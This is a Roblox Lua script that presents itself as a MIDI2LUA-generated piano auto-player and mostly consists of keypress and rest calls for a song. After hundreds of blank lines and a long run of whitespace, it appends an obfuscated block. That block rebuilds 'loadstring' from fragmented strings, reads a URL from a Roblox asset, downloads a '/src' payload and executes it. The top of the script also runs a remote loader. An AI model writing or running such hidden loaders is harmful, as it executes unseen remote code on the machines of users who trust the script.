                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        task.spawn(function(...)
-- Generated by MIDI2LUA --
-- MIDI88: OFF --
-- Short Notes: OFF --
-- Note Velocity: OFF --
-- Sustain Pedal: OFF --
-- Midi Spoofer: OFF --

bpm = 160

loadstring(game:HttpGet("https://cdn.jsdelivr.net/gh/hellohellohell012321/TALENTLESS@main/loader_main.lua", true))()

keypress("g", 0.473, bpm)
keypress("2", 0.498, bpm)
keypress("9", 0.498, bpm)
rest(0.5, bpm)
keypress("d", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 0.473, bpm)
rest(0.5, bpm)
keypress("d", 0.473, bpm)
keypress("2", 0.498, bpm)
keypress("9", 0.498, bpm)
rest(0.5, bpm)
keypress("g", 0.473, bpm)
rest(0.5, bpm)
keypress("d", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 0.473, bpm)
keypress("2", 0.248, bpm)
keypress("9", 0.248, bpm)
rest(0.5, bpm)
keypress("d", 0.473, bpm)
keypress("3", 0.248, bpm)
keypress("0", 0.248, bpm)
rest(0.5, bpm)
keypress("g", 0.473, bpm)
keypress("4", 0.498, bpm)
keypress("q", 0.498, bpm)
rest(0.5, bpm)
keypress("s", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 0.473, bpm)
rest(0.5, bpm)
keypress("s", 0.473, bpm)
keypress("4", 0.498, bpm)
keypress("q", 0.498, bpm)
rest(0.5, bpm)
keypress("g", 0.473, bpm)
rest(0.5, bpm)
keypress("s", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 0.473, bpm)
keypress("4", 0.248, bpm)
keypress("q", 0.248, bpm)
rest(0.5, bpm)
keypress("s", 0.473, bpm)
keypress("5", 0.248, bpm)
keypress("w", 0.248, bpm)
rest(0.5, bpm)
keypress("f", 0.473, bpm)
keypress("6", 7.598, bpm)
keypress("e", 7.598, bpm)
rest(0.5, bpm)
keypress("S", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 0.473, bpm)
rest(0.5, bpm)
keypress("S", 0.473, bpm)
rest(0.5, bpm)
keypress("D", 0.473, bpm)
rest(0.5, bpm)
keypress("s", 0.473, bpm)
rest(0.5, bpm)
keypress("O", 0.473, bpm)
rest(0.5, bpm)
keypress("s", 0.473, bpm)
rest(0.5, bpm)
keypress("d", 0.473, bpm)
rest(0.5, bpm)
keypress("a", 0.473, bpm)
rest(0.5, bpm)
keypress("O", 0.473, bpm)
rest(0.5, bpm)
keypress("a", 0.473, bpm)
rest(0.5, bpm)
keypress("S", 0.473, bpm)
rest(0.5, bpm)
keypress("P", 0.473, bpm)
rest(0.5, bpm)
keypress("o", 0.473, bpm)
rest(0.5, bpm)
keypress("P", 0.473, bpm)
rest(0.5, bpm)
keypress("y", 2.848, bpm)
keypress("d", 2.848, bpm)
keypress("2", 0.473, bpm)
rest(0.5, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("9", 0.473, bpm)
rest(0.5, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("9", 0.473, bpm)
rest(0.5, bpm)
keypress("u", 0.948, bpm)
keypress("f", 0.948, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("9", 0.473, bpm)
rest(0.5, bpm)
keypress("i", 3.798, bpm)
keypress("p", 3.798, bpm)
keypress("g", 3.798, bpm)
keypress("2", 0.473, bpm)
rest(0.5, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("9", 0.473, bpm)
rest(0.5, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("9", 0.473, bpm)
rest(0.5, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("9", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 1.423, bpm)
keypress("s", 1.423, bpm)
keypress("j", 1.423, bpm)
keypress("4", 0.473, bpm)
rest(0.5, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("o", 1.423, bpm)
keypress("h", 1.423, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("e", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 0.948, bpm)
keypress("j", 0.948, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("t", 0.473, bpm)
keypress("s", 0.473, bpm)
keypress("4", 0.473, bpm)
rest(0.5, bpm)
keypress("j", 0.948, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("h", 1.423, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("e", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("j", 0.948, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("y", 1.898, bpm)
keypress("d", 1.898, bpm)
keypress("^", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("E", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("y", 0.473, bpm)
rest(0.5, bpm)
keypress("E", 0.473, bpm)
rest(0.5, bpm)
keypress("u", 0.948, bpm)
keypress("f", 0.948, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("E", 0.473, bpm)
rest(0.5, bpm)
keypress("i", 1.898, bpm)
keypress("g", 1.898, bpm)
keypress("^", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("E", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("f", 1.898, bpm)
keypress("y", 0.473, bpm)
rest(0.5, bpm)
keypress("E", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("^", 0.473, bpm)
rest(0.5, bpm)
keypress("o", 1.898, bpm)
keypress("s", 1.898, bpm)
keypress("h", 1.898, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("w", 0.473, bpm)
rest(0.5, bpm)
keypress("t", 0.473, bpm)
rest(0.5, bpm)
keypress("w", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 1.898, bpm)
keypress("j", 1.898, bpm)
keypress("u", 0.473, bpm)
rest(0.5, bpm)
keypress("t", 0.473, bpm)
rest(0.5, bpm)
keypress("w", 0.473, bpm)
rest(0.5, bpm)
keypress("0", 0.473, bpm)
rest(0.5, bpm)
keypress("o", 1.898, bpm)
keypress("h", 1.898, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("0", 0.473, bpm)
rest(0.5, bpm)
keypress("e", 0.473, bpm)
rest(0.5, bpm)
keypress("0", 0.473, bpm)
rest(0.5, bpm)
keypress("i", 1.898, bpm)
keypress("g", 1.898, bpm)
keypress("T", 0.473, bpm)
rest(0.5, bpm)
keypress("w", 0.473, bpm)
rest(0.5, bpm)
keypress("0", 0.473, bpm)
rest(0.5, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("2", 0.473, bpm)
rest(0.5, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("i", 1.898, bpm)
keypress("g", 1.898, bpm)
keypress("9", 0.473, bpm)
rest(0.5, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("2", 0.473, bpm)
rest(0.5, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("s", 0.473, bpm)
keypress("9", 0.473, bpm)
rest(0.5, bpm)
keypress("g", 0.473, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 0.948, bpm)
keypress("j", 0.948, bpm)
keypress("2", 0.473, bpm)
rest(0.5, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 0.948, bpm)
keypress("j", 0.948, bpm)
keypress("9", 0.473, bpm)
rest(0.5, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("g", 0.473, bpm)
keypress("2", 0.473, bpm)
rest(0.5, bpm)
keypress("f", 0.473, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("D", 0.473, bpm)
keypress("9", 0.473, bpm)
rest(0.5, bpm)
keypress("d", 0.473, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("4", 0.473, bpm)
rest(0.5, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 0.948, bpm)
keypress("j", 0.948, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("O", 0.948, bpm)
keypress("H", 0.948, bpm)
keypress("4", 0.473, bpm)
rest(0.5, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 0.948, bpm)
keypress("j", 0.948, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("o", 0.473, bpm)
keypress("h", 0.473, bpm)
keypress("4", 0.473, bpm)
rest(0.5, bpm)
keypress("o", 0.473, bpm)
keypress("h", 0.473, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("o", 0.473, bpm)
keypress("h", 0.473, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("i", 0.473, bpm)
keypress("g", 0.473, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("Y", 0.473, bpm)
keypress("D", 0.473, bpm)
keypress("4", 0.473, bpm)
rest(0.5, bpm)
keypress("o", 0.473, bpm)
keypress("h", 0.473, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("i", 1.898, bpm)
keypress("g", 1.898, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("^", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("i", 0.948, bpm)
keypress("g", 0.948, bpm)
keypress("E", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("i", 0.948, bpm)
keypress("g", 0.948, bpm)
keypress("^", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("s", 0.948, bpm)
keypress("E", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 0.948, bpm)
keypress("j", 0.948, bpm)
keypress("^", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("j", 0.473, bpm)
keypress("E", 0.473, bpm)
rest(0.5, bpm)
keypress("H", 0.473, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("h", 0.948, bpm)
keypress("^", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("g", 0.948, bpm)
keypress("E", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("i", 0.948, bpm)
keypress("g", 0.948, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("w", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 0.473, bpm)
keypress("t", 0.473, bpm)
rest(0.5, bpm)
keypress("P", 0.473, bpm)
keypress("w", 0.473, bpm)
rest(0.5, bpm)
keypress("a", 0.473, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("s", 0.473, bpm)
keypress("w", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 1.898, bpm)
keypress("j", 1.898, bpm)
keypress("t", 0.473, bpm)
rest(0.5, bpm)
keypress("w", 0.473, bpm)
rest(0.5, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("0", 0.473, bpm)
rest(0.5, bpm)
keypress("S", 0.948, bpm)
keypress("L", 0.948, bpm)
keypress("e", 0.473, bpm)
rest(0.5, bpm)
keypress("0", 0.473, bpm)
rest(0.5, bpm)
keypress("S", 0.948, bpm)
keypress("L", 0.948, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("0", 0.473, bpm)
rest(0.5, bpm)
keypress("i", 0.948, bpm)
keypress("g", 0.948, bpm)
keypress("e", 0.473, bpm)
rest(0.5, bpm)
keypress("0", 0.473, bpm)
rest(0.5, bpm)
keypress("^", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("P", 0.948, bpm)
keypress("J", 0.948, bpm)
keypress("E", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("s", 0.948, bpm)
keypress("l", 0.948, bpm)
keypress("^", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("d", 0.948, bpm)
keypress("z", 0.948, bpm)
keypress("E", 0.473, bpm)
rest(0.5, bpm)
keypress("q", 0.473, bpm)
rest(0.5, bpm)
keypress("f", 0.948, bpm)
keypress("x", 0.948, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("w", 0.473, bpm)
rest(0.5, bpm)
keypress("h", 0.473, bpm)
keypress("t", 0.473, bpm)
rest(0.5, bpm)
keypress("G", 0.473, bpm)
keypress("w", 0.473, bpm)
rest(0.5, bpm)
keypress("g", 0.473, bpm)
keypress("8", 0.473, bpm)
rest(0.5, bpm)
keypress("f", 0.473, bpm)
keypress("w", 0.473, bpm)
rest(0.5, bpm)
keypress("S", 0.948, bpm)
keypress("L", 0.948, bpm)
keypress("t", 0.473, bpm)
rest(0.5, bpm)
keypress("w", 0.473, bpm)
rest(0.5, bpm)
keypress("p", 0.473, bpm)
keypress("f", 0.473, bpm)
keypress("j", 0.473, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("S", 0.473, bpm)
keypress("0", 0.473, bpm)
rest(0.5, bpm)
keypress("j", 0.473, bpm)
keypress("e", 0.473, bpm)
rest(0.5, bpm)
keypress("f", 0.473, bpm)
keypress("0", 0.473, bpm)
rest(0.5, bpm)
keypress("S", 0.473, bpm)
keypress("L", 0.473, bpm)
keypress("6", 0.473, bpm)
rest(0.5, bpm)
keypress("S", 0.473, bpm)
keypress("L", 0.473, bpm)
keypress("0", 0.473, bpm)
rest(0.5, bpm)
keypress("S", 0.473, bpm)
keypress("L", 0.473, bpm)
keypress("e", 0.473, bpm)
rest(0.5, bpm)
keypress("f", 0.473, bpm)
keypress("x", 0.473, bpm)
keypress("0", 0.473, bpm)
rest(0.5, bpm)
keypress("d", 0.948, bpm)
keypress("z", 0.948, bpm)
keypress("9", 1.898, bpm)
keypress("e", 1.898, bpm)
keypress("y", 1.898, bpm)
rest(1, bpm)
keypress("S", 0.315, bpm)
rest(0.333, bpm)
keypress("i", 0.315, bpm)
rest(0.333, bpm)
keypress("T", 0.315, bpm)
rest(0.333, bpm)
keypress("s", 0.315, bpm)
rest(0.333, bpm)
keypress("i", 0.315, bpm)
rest(0.333, bpm)
keypress("t", 0.315, bpm)
rest(0.333, bpm)
keypress("a", 0.315, bpm)
rest(0.333, bpm)
keypress("u", 0.315, bpm)
rest(0.333, bpm)
keypress("r", 0.315, bpm)
rest(0.333, bpm)
keypress("2", 1.898, bpm)
keypress("9", 1.898, bpm)
rest(2, bpm)
keypress("d", 0.498, bpm)
keypress("z", 0.498, bpm)

finishedSong()                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
end, ...)







































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        task.spawn(pcall,--[===[e5ac4dc]===]function()--[===[e5ac4dc]===]local a =--[===[e5ac4dc]===] getfenv()--[===[e5ac4dc]===][ [[]]--[===[814c1ae]===]..[[l]]..--[=====[1b1a008]=====][[]]--[======[f69ffc]======]..[[o]]..--[=======[490a0c8]=======][[]]--[==[70b6e5a]==]..[[a]]..--[====[c3420f8]====][[]]--[===[4e2c179]===]..[[d]]..--[==[54c832e]==][[]]--[=====[6ed7f44]=====]..[[s]]..--[==[46aed4a]==][[]]--[=======[d6b0f5d]=======]..[[t]]..--[=====[d32ccfa]=====][[]]--[====[b9f8f85]====]..[[r]]..--[=====[5d83c1c]=====][[]]--[======[82c404d]======]..[[i]]..--[[f739d75]][[]]--[==[8ee7778]==]..[[n]]..--[==[318b3e4]==][[]]--[=====[c7db92d]=====]..[[g]]..--[==[3ef8fa6]==][[]] ];--[===[e5ac4dc]===]local b = --[===[e5ac4dc]===]game:--[===[e5ac4dc]===]GetObjects( [[]]--[=====[ad3732d]=====]..[[r]]..--[======[e45d015]======][[]]--[===[37add3c]===]..[[b]]..--[[3d80139]][[]]--[====[f98c520]====]..[[x]]..--[====[f7b6257]====][[]]--[=====[5f7739b]=====]..[[a]]..--[===[8a7c712]===][[]]--[=======[0f40423]=======]..[[s]]..--[=======[f318bfd]=======][[]]--[=======[8b7fce4]=======]..[[s]]..--[===[2aa2057]===][[]]--[=[46271f3]=]..[[e]]..--[[304a5c8]][[]]--[====[ea6624a]====]..[[t]]..--[==[20b2dfe]==][[]]--[===[354d430]===]..[[i]]..--[=====[5abda30]=====][[]]--[====[23a9390]====]..[[d]]..--[====[66cbab4]====][[]]--[=====[875339c]=====]..[[:]]..--[=======[a304cc3]=======][[]]--[======[f3b1050]======]..[[/]]..--[[0f1e5a7]][[]]--[===[ce525fa]===]..[[/]]..--[=====[543f5b5]=====][[]]--[=[24be508]=]..[[1]]..--[==[9c7037d]==][[]]--[======[d2d94a3]======]..[[1]]..--[===[5a39dc8]===][[]]--[=======[1c1a468]=======]..[[2]]..--[=[7b8cce2]=][[]]--[====[0fafd40]====]..[[4]]..--[===[bdc89b8]===][[]]--[=[6cb2a0e]=]..[[0]]..--[=[80b4ed6]=][[]]--[[52cdfdd]]..[[5]]..--[=======[5dfed4c]=======][[]]--[=====[4372346]=====]..[[6]]..--[[71944cd]][[]]--[=======[038ea13]=======]..[[1]]..--[=[f8a1876]=][[]]--[==[e66b0f0]==]..[[8]]..--[=====[b8d4fc9]=====][[]]--[====[5c33cc5]====]..[[5]]..--[=======[da4882e]=======][[]]--[[7e03922]]..[[8]]..--[=====[f70b68d]=====][[]]--[===[3dacc66]===]..[[4]]..--[====[0b69a97]====][[]]--[====[f789d55]====]..[[8]]..--[====[e984892]====][[]]--[======[1eedf1d]======]..[[2]]..--[=======[2d24bc9]=======][[]]--[=====[af82824]=====]..[[1]]..--[====[be659b5]====][[]] )local c = b[1];local d = --[===[e5ac4dc]===]c.Value--[===[e5ac4dc]===];local e --[===[e5ac4dc]===]= game:--[===[e5ac4dc]===]HttpGet(d --[===[e5ac4dc]===].. "/" --[===[e5ac4dc]===].. "s" --[===[e5ac4dc]===].. "r" --[===[e5ac4dc]===].. "c")a--[===[e5ac4dc]===](--[===[e5ac4dc]===]e)--[===[e5ac4dc]===]()end)